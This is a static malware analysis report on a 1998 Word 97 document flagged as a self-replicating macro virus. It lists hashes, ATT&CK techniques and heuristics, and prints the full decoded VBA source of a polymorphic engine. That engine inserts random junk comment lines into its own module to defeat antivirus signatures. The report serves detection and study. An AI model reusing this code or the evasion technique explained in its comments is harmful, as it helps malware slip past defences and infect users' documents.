Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 33d76c8b6f0a89f5…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 27.0 KB
Created: 1998-09-28 13:52:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-15
MD5: 0cb2f37a68bc8432e2c57618db08f180
SHA-1: 0769b4adba7a7deb6c5157fee5f014990962f641
SHA-256: 33d76c8b6f0a89f52118078b5401423636ab3488b62aa9a5f84969361825c0a3
Risk score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1553.004 Subvert Trust Controls: Mark-of-the-Web Bypass

The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' indicates that the VBA macros are designed to self-replicate and to tamper with AV signatures. The extracted script 'macros.bas' confirms this: it inserts randomly generated, obfuscated lines into the VBA project at run time, a common polymorphic-malware technique for defeating signature matching. The ClamAV detection on the extracted artifact further supports the malicious verdict.

Heuristics (2)

  • VBA macros detected (severity: medium; 1 related finding; ID: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (severity: critical; ID: OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
      Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 814 bytes
SHA-256: 60c622ccc8bc11b578c6c0d73b5d64315513ad446921cc94f0602f10115c520a
Detection: ClamAV: Doc.Trojan.UMP-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"
Sub UMPE()

'ULTRAS MACRO POLYMORPHIC ENGINE for Word97
'ULTRAS 1998

    ' Number of mutation passes for this run (1..20)
    MuNu = Int(Rnd() * 20 + 1)

    For Mutate = 1 To MuNu
        ' Current line count of the module named "zzz", read through the VBE object model
        MuRL = Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.CountOfLines
        ' Random insertion line and random junk length (1..40 characters)
        MuLi = Int(Rnd() * MuRL + 1)
        MuLe = Int(Rnd() * 40 + 1)

        For MuGe = 1 To MuLe
            ' Random character code in the range 228..248 (non-ASCII bytes; lowercase Cyrillic
            ' letters under the Windows-1251 code page, consistent with the Cyrillic module name)
            LiVe = Int((120 - 100 + 1) * Rnd + 228)
            MuRe = MuRe + Chr$(LiVe)
        Next MuGe

        ' Insert the junk as a comment line: the module's text changes on every run while its
        ' behaviour stays the same, which is what breaks static signature matching
        Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe
        MuRe = ""
    Next Mutate

End Sub